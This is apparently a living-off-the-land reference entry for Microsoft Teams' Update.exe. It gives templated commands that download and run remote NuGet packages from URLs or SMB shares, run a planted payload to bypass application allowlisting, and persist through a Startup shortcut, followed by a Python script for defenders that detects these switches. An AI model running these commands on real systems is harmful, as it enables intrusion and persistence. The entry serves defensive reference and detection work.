Update.exe

Download
AWL bypass (Nuget, Remote, CMD)
Execute (Nuget, Remote, CMD, EXE)

Binary that updates an installed NuGet/Squirrel package. Part of the Microsoft Teams installation.

Paths:

Resources:

Acknowledgements:

Detections:

Download

  1. Update.exe goes to the URL, looks for the RELEASES file and downloads the NuGet package.

    Update.exe --download {REMOTEURL}

    Use case: Download binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218

AWL bypass

  1. Update.exe goes to the URL, looks for the RELEASES file, then downloads and installs the NuGet package.

    Update.exe --update={REMOTEURL}

    Use case: Download and execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: Nuget; Execute: Remote

  2. Update.exe goes to the SMB folder path, looks for the RELEASES file, then downloads and installs the NuGet package via SAMBA.

    Update.exe --update={PATH_SMB:folder}

    Use case: Download and execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: Nuget; Execute: Remote

  3. Update.exe goes to the URL, looks for the RELEASES file, then downloads and installs the NuGet package.

    Update.exe --updateRollback={REMOTEURL}

    Use case: Download and execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: Nuget; Execute: Remote

  4. Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\, then run the command. Update.exe will execute the file you copied.

    Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"

    Use case: Application Whitelisting Bypass
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: CMD; Execute: Remote

  5. Update.exe goes to the SMB folder path, looks for the RELEASES file, then downloads and installs the NuGet package via SAMBA.

    Update.exe --updateRollback={PATH_SMB:folder}

    Use case: Download and execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: Nuget; Execute: Remote

Execute

  1. Update.exe goes to the URL, looks for the RELEASES file, then downloads and installs the NuGet package.

    Update.exe --update={REMOTEURL}

    Use case: Download and execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: Nuget; Execute: Remote

  2. Update.exe goes to the SMB folder path, looks for the RELEASES file, then downloads and installs the NuGet package via SAMBA.

    Update.exe --update={PATH_SMB:folder}

    Use case: Download and execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: Nuget; Execute: Remote

  3. Update.exe goes to the URL, looks for the RELEASES file, then downloads and installs the NuGet package.

    Update.exe --updateRollback={REMOTEURL}

    Use case: Download and execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: Nuget; Execute: Remote

  4. Update.exe goes to the SMB folder path, looks for the RELEASES file, then downloads and installs the NuGet package via SAMBA.

    Update.exe --updateRollback={PATH_SMB:folder}

    Use case: Download and execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: Nuget; Execute: Remote

  5. Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\, then run the command. Update.exe will execute the file you copied.

    Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"

    Use case: Execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1218
    Tags: Execute: CMD

  6. Copy your payload into "%localappdata%\Microsoft\Teams\current\", then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". The payload will then run at every login of the user who ran the command.

    Update.exe --createShortcut={PATH:.exe} -l=Startup

    Use case: Execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1547
    Tags: Execute: EXE

  7. Run the command to remove the shortcut that the "--createShortcut" command described on this page created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory.

    Update.exe --removeShortcut={PATH:.exe} -l=Startup

    Use case: Execute binary
    Privileges required: User
    Operating systems: Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique: T1070
    Tags: Execute: EXE
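
A triage sketch for the command lines listed above, added here as an example and not part of the original entry: it parses process-creation command lines and reports the switches this page documents, with the technique the page assigns to each. The sample command lines are constructed, and the `EXPECTED_PROCESS_START` allowlist is an assumption to tune per environment.

```python
import re

# Switches listed on this page -> ATT&CK technique the page assigns to them.
SWITCHES = {"--download": "T1218", "--update": "T1218", "--updaterollback": "T1218",
            "--processstart": "T1218", "--createshortcut": "T1547",
            "--removeshortcut": "T1070"}
FETCHES = {"--download", "--update", "--updaterollback"}
# Assumption: Teams itself only starts Teams.exe this way; tune per environment.
EXPECTED_PROCESS_START = {"teams.exe"}
REMOTE = re.compile(r"(?i)^(https?://|\\\\)")  # http(s) URL or UNC/SMB path
ARG = re.compile(r'(--?[A-Za-z][\w-]*)(?:[=\s]\s*(?!-)("[^"]*"|\S+))?')

def split_image(cmdline):
    """Return (lower-cased image file name, remaining arguments)."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))\s*(.*)', cmdline, re.S)
    if not m:
        return "", ""
    image = m.group(1) or m.group(2) or ""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower(), m.group(3)

def triage(cmdline):
    """Return (switch, technique, note) findings for one process command line."""
    image, rest = split_image(cmdline)
    if image != "update.exe":
        return []
    args = {k.lower(): (v or "").strip('"') for k, v in ARG.findall(rest)}
    findings = []
    for switch, value in args.items():
        if switch not in SWITCHES:
            continue
        if switch == "--processstart" and value.lower() in EXPECTED_PROCESS_START:
            continue  # the ordinary Teams launch, not a finding
        note = "review"
        if switch in FETCHES:
            note = "remote source" if REMOTE.match(value) else "local source"
        elif switch == "--createshortcut" and args.get("-l", "").lower() == "startup":
            note = "startup persistence"
        findings.append((switch, SWITCHES[switch], note))
    return findings

SAMPLES = [  # constructed command lines, not real telemetry
    r'"C:\Users\u\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
    r'Update.exe --update=https://updates.example.invalid/feed',
    r'Update.exe --updateRollback=\\fileserver.example.invalid\share',
    r'Update.exe --createShortcut=helper.exe -l=Startup',
    r'C:\Windows\System32\notepad.exe --update=https://updates.example.invalid/feed',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line)
```

Matching on the image file name alone misses a renamed copy, so where telemetry carries the binary's original file name or signer, key on that as well.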